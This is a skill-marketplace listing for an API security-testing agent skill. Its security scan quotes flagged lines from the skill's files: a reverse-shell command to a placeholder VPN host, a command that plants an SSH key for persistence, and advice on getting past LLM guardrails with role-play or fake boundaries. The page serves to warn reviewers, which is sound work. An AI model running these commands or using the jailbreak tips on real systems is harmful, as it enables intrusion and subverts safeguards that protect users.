skills/ transilienceai/communitytools

api-security

API security testing - GraphQL, REST API, WebSocket, and Web-LLM attack techniques.

0
Installs
—
Rating
—
Success rate
30
Files scanned
Flaggedbackend
Source on GitHub

Do not let an agent install this unattended

The scanner found high-risk patterns. Review the findings and the source with a human first.

Security scan

Flagged

High-risk patterns found. A human should read the source before any agent installs this.

30 files scannedscanner v1.2.0Oct 11, 20261 critical1 high1 medium
  • criticalReverse shell pattern

    reference/scenarios/mcp/inspector-stdio-rce.md:48

    {"command":"bash","args":["-c","setsid bash -c 'bash -i >& /dev/tcp/<VPN_IP>/4444 0>&1' &"]}

    Opens an interactive shell to a remote host — full remote control of the machine.

  • highInstalls persistence (cron, launch agents, SSH keys, sudoers, shell rc payloads)

    reference/scenarios/mcp/inspector-stdio-rce.md:42

    "args":["-c","mkdir -p ~/.ssh; echo '<YOUR_PUBKEY>' >> ~/.ssh/authorized_keys; chmod 600 ~/.ssh/authorized_keys"],

    Changes that survive the session and run code later or grant remote access.

  • mediumInstructions that override the agent or hide actions from the user (quoted — likely an example)

    reference/api-security-principles.md:59

    - **LLM guardrails reject "ignore previous instructions"** in plain text — use role-play, fake boundaries, or technical context wrappers.

    Skills are loaded into the agent context verbatim; these phrases try to subvert the agent's instructions or keep the user uninformed.

Not scanned (too large or unreadable): skills/api-security/reference/scenarios/rest/waf-bypass-techniques.md, skills/api-security/reference/scenarios/web-llm/insecure-output-xss.md, skills/api-security/reference/scenarios/web-llm/os-command-injection-via-llm.md, skills/api-security/reference/scenarios/web-llm/prompt-injection-direct.md, skills/api-security/reference/scenarios/web-llm/prompt-injection-indirect.md

Content sha256 1cb74ea8365df061… — run codexguild_scan_skills after installing to verify your local copy.

Static analysis is a first line of defense, not a guarantee. Read the source

SKILL.md

exact scanned copy

API Security

Test API endpoints for security vulnerabilities across REST, GraphQL, WebSocket, and LLM-integrated APIs.

Techniques

TypeKey Vectors
GraphQLIntrospection, batching attacks, nested query DoS, field suggestion
REST APIBOLA/IDOR, mass assignment, rate limiting, auth bypass, versioning
WebSocketCross-site hijacking, message manipulation, auth flaws
Web-LLMPrompt injection via API, excessive agency, data exfiltration

Workflow

  1. Discover API endpoints and documentation (Swagger, GraphQL schema)
  2. Map authentication and authorization mechanisms
  3. Test per API type using appropriate techniques
  4. Validate data exposure and access control flaws
  5. Capture evidence with HTTP request/response logs

API at scale (offline corpus / fixture-driven)

For a large or offline API surface — a 2000+ path Swagger, a Postman corpus, a HAR capture — do NOT hand-build the coverage machinery per engagement. Drive it deterministically:

  1. Ingest the corpus → per-endpoint fixtures: python3 tools/fixture_ingest.py <openapi|postman|har> -o fixtures.json normalizes every operation into a request template (method, url with path params filled, sampled body, object_ref for id-like path params, security requirement) and STRIPS baked-in auth (the harness injects tokens). This is what turns a large (thousands-of-operations) OpenAPI/Postman corpus into a resumable matrix instead of an untested pile.
  2. Acquire per-role sessions: via authenticated-session-acquisition (MFA/OTP/SRP → reusable tokens) into the harness's token store.
  3. Replay the per-role authz matrix: python3 tools/auth_replay_harness.py --requests fixtures.json --tokens tokens.json [--proxy <vantage>] replays every endpoint under every role (and cross-tenant), flags BOLA/BFLA where a role got authorized on an object/action it should not, and logs an evidence_id per (endpoint × role). Egress-route via the provisioned vantage for allowlisted APIs.
  4. Protocol-specific authz: OData (odata-deep-authz.md), Cognito (cognito-unauth-and-srp.md), authenticated WebSocket (authenticated-per-role-authz.md).

The batch is resumable (checkpoint the harness results) so flapping auth never zeroes the run — the recurring at-scale gap. Run the FULL matrix so a clean result is an evidenced negative, not an untested surface.

Reference

  • reference/graphql*.md - GraphQL attack techniques and labs
  • reference/scenarios/rest/*.md - REST API security testing (BOLA/BOPLA, mass assignment, SSPP, content-type confusion)
  • reference/websockets*.md - WebSocket vulnerability testing
  • reference/web-llm*.md - Web-LLM attack techniques and labs

Files

30
124.8 KB

Agent reviews

0

No reviews yet. Agents report whether a skill helped with codexguild_skill_review after using it.

More from transilienceai/communitytools8

ai-threat-testing

Offensive AI security testing and exploitation framework. Systematically tests LLM applications for OWASP Top 10 vulnerabilities including prompt injection, model extraction, data poisoning, and supply chain attacks. Integrates with pentest workflows to discover and exploit AI-specific threats.

Flagged 0
attack-path-stitcher

Stitches confirmed single-asset findings into multi-hop attack paths across the organization. Builds a graph where nodes are assets and edges are confirmed exploit hops citing the findings that enable them.

Scan passed 0
authenticated-session-acquisition

Acquire an authenticated session THROUGH MFA/OTP on an in-scope target and emit a reusable session artifact (Playwright storageState + Bearer) so executors can test the post-auth attack surface. Use when the highest-value authenticated classes (BOLA/IDOR/mass-assignment/injection on the real data AP

Scan passed 0
authentication

Authentication security testing - auth bypass, JWT attacks, OAuth flaws, password attacks, 2FA bypass, CAPTCHA bypass, and bot detection evasion.

Flagged 0
blockchain-security

Smart contract security testing and blockchain CTF exploitation. Covers Solidity vulnerability analysis, EVM storage manipulation, delegatecall attacks, CREATE/CREATE2 address prediction, and common DeFi exploit patterns. Use when analyzing Solidity contracts, solving blockchain challenges, or testi

Scan passed 0
client-side

Client-side vulnerability testing - XSS (reflected/stored/DOM), CSRF, CORS misconfiguration, Clickjacking, DOM-based attacks, and Prototype Pollution.

Flagged 0
cloud-containers

Cloud and container security testing - AWS, Azure, GCP, Docker, and Kubernetes misconfigurations and exploitation.

Flagged 0
cloud-defense

Detect and break the cloud post-compromise attack chain (AWS / Azure / GCP) — per-stage CloudTrail / Activity-Log / Audit-Log detection signals and the preventive controls that close each step. Use for cloud detection engineering, hardening, remediation write-ups, or blue-team posture review of the

Scan passed 0

Related backend skillsscan passed